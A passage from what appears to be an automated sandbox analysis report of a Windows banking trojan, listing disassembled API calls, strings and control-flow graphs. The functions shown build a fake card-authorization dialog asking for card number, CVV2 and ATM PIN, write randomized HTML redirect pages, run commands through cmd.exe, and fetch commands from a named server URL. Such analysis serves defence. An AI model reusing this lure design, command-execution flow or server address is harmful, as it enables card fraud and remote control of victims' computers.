                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 408 406aad-406aef sprintf call 407a04 lstrlenA 404->408 407 406a27-406a61 DeleteFileA sprintf WinExec 405->407 406->407 407->398 411 406b17-406b1e 408->411 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1984377301.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1984355938.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984697052.000000000042A000.00000004.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984738223.000000000042E000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984773155.000000000042F000.00000002.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984812704.0000000000436000.00000020.00000001.01000000.00000008.sdmpDownload File
                            • Associated: 00000005.00000002.1984845188.0000000000438000.00000002.00000001.01000000.00000008.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_Olijjb32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
